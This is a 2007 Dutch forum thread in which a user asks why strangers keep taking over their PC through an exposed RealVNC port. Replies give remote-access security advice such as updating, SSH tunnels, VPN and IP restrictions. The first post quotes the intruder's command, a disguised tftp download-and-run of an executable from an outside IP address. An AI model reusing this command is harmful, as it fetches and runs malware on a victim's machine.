Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Realvnc Makkelijk te hacken / slechte beveiliging?

Pagina: 1
Acties:
  • 664 views sinds 30-01-2008
  • Reageer

Verwijderd

Topicstarter
Ik maak al een lange tijd gebruik van het programma realvnc. Het werkte altijd perfect zonder problemen. Maar de laatste maanden is het alsof er continue iemand verbinding maakt met mijn pc.

Zodra ik de firewall toestemming geef voor poort 5900 en de router doorlus naar mijn pc is binnen 1 dag wel iemand in mijn pc komen kijken. Ik kan het zien doordat er vensters geopend worden. En doordat er in uitvoeren de volgende commando staat:
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 76.222.116.73 GET wazja.exe & start wazja&

Weet iemand wat dit doet en wat ik kan doen tegen dit probleem???

(ik gebruik hem bijna nooit en gebruik remote desktop als vervanger, maar soms moet de pc niet uitgelogt worden zodra ik hem wil besturen en daar is vnc weer handig voor. En ook een moeilijker paswoord schijnt niet te helpen hiertegen)

Verwijderd

Omdat je je poort openhebt staan zijn er mensen die actief random ip's afgaan op jouw poort nummer. Dit is al eens eerder geweest op GoT, wat er vervolgens gebeurt is dat er een bestandje vanaf een FTP server gehaald wordt en uitgevoerd. Wat het bestandje doet weet ik niet, maar het is iig niet niks heb ik zo door.

Eventueel dat Realvnc gewoon niet 'veilig' is en je voor een alternatief moet zoeken (Bijv windows remote desktop zelf).

  • flapstaart
  • Registratie: Juli 2003
  • Laatst online: 29-11 00:41
Je kan ook Remote Administrator eens proberen, ik gebruik deze al jaren met plezier: http://www.radmin.nl/

  • 0X55AA
  • Registratie: Juni 2005
  • Laatst online: 07-05-2023
flapstaart schreef op woensdag 22 augustus 2007 @ 07:28:
Je kan ook Remote Administrator eens proberen, ik gebruik deze al jaren met plezier: http://www.radmin.nl/
Heb ook al veel ervaringen met Radmin, en dit is toch wel een van de toppers van dergelijke programma's.

Het beste gebruik je een custom poort, niet het standaard poortje. En dan nog eens een wachtwoord dat echt een wachtwoord is (en dus niet "1234") ;) En er kan weinig mislopen.

Ik zou je huidige toestand toch zo snel mogelijk oplossen, want mensen die zomaar access hebben tot jouw bak en nog eens proggies op installeren... kan nooit goed zijn.

  • eghie
  • Registratie: Februari 2002
  • Niet online

eghie

Spoken words!

Er was een half jaar terug een lek in VNC, waardoor je er zonder wachtwoord binnen kon komen, ook al had je een wachtwoord. Kan zijn dat je een hele oude versie hebt. Hier zijn namelijk ook exploits voor geschreven, die vrij makkelijk te vinden zijn door iedereen. Als het goed is is dat probleem al lang opgelost, maar het kan zijn dat jij nog een oude versie hebt?

Ik zelf gebruik altijd TightVNC of UltraVNC. Meestal TightVNC. UltraVNC kan soms ook handig zijn, maar vind TightVNC fijner met het weergeven van het beeld van je PC. Ik zou die eens proberen, volgens mij hebben die de lekken niet meer. Tenminste, ik heb al een paar pc's openstaan op het internet met TightVNC, nog niet echt meer gehacked via VNC, nadat ik die lek had gepachted.

  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

Inderdaad gaan er nogal wat exploits rond. Het is net zoals met je OS en alle applicaties zo dat je uptodate moet blijven. Radmin is trouwens niet gratis, vraag is of dat voor je uitmaakt om veilig te werken ;)

Als je het veiliger wilt doen met het gratis VNC (en geen remote desktop kan of wil gebruiken), kan je eerst 'inbellen' naar VPN en dan pas de VNC of andere remote client toegang geven. Of, zoals ik het vroegah toen ik het gebruikte deed, VNC alleen vanaf bepaalde IP-adressen (werk) toegang geven.

Ga trouwens ook even zoeken wat er aan troep (backdoor / bot) is achtergebleven.

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)


  • Crakie
  • Registratie: Augustus 2006
  • Laatst online: 30-11 17:29

Crakie

I want my board back, Lance

Ik werkte met een SSH-tunnel (custom poort + key authentication) voor de VNC-verbinding. Is niet moeilijk en harstikke veilig. Iemand moet het wel speciaal op jou gemunt hebben wil ie nog gaan inbreken - de meesten zullen gewoon op zoek gaan naar 'een fiets die minder goed op slot staat' ;)

Deze signature is strikt genomen langer dan noodzakelijk.


Verwijderd

Topicstarter
Okej het kan wel dat ik een oudere versie gebruikte. Ik heb nu ook een volledige versie geinstalleerd waarvan ik het idee heb dat dit al beter en veiliger werkt.

- Mijn wachtwoorden zijn altijd met hoofdletters kleine letters getallen en tekens.
- Gebruik ook niet altijd de standaard poorten.
- Remote desktop gebruik ik ook al jaren, superhandig, tenzij de pc niet uitgelogt moet worden.
- En ssh tunnel gebruik ik ook al een tijd ook een handig systeempje .

Maar soms ben ik ergens waar ik niet de mogelijkheid heb tunnelier te installeren of alleen 5900 open staat en een custom poort uitgaand geblokeerd is of als ik niet wil dat het systeem uitlogt, moest ik dus een standaard vnc verbinding gebruiken.

Maar eens kijken of deze volledige versie normaal werkt. En of er iets afgebleven is.. vast wel, maar een verse installatie zal dit niet goed doen. :P

Was gewoon nieuwsgierig naar wat deze persoon aan het doen was als ik rustig een filmpje aan het kijken was en ik zag mijn muis weer over het beeld gaan ;) Later ging ik gewoon kijken hoelang het duurde dat dit gebeurde als ik mn firewall toestemming gaf.

In ieder geval bedankt.

[ Voor 21% gewijzigd door Verwijderd op 25-08-2007 12:16 ]

Pagina: 1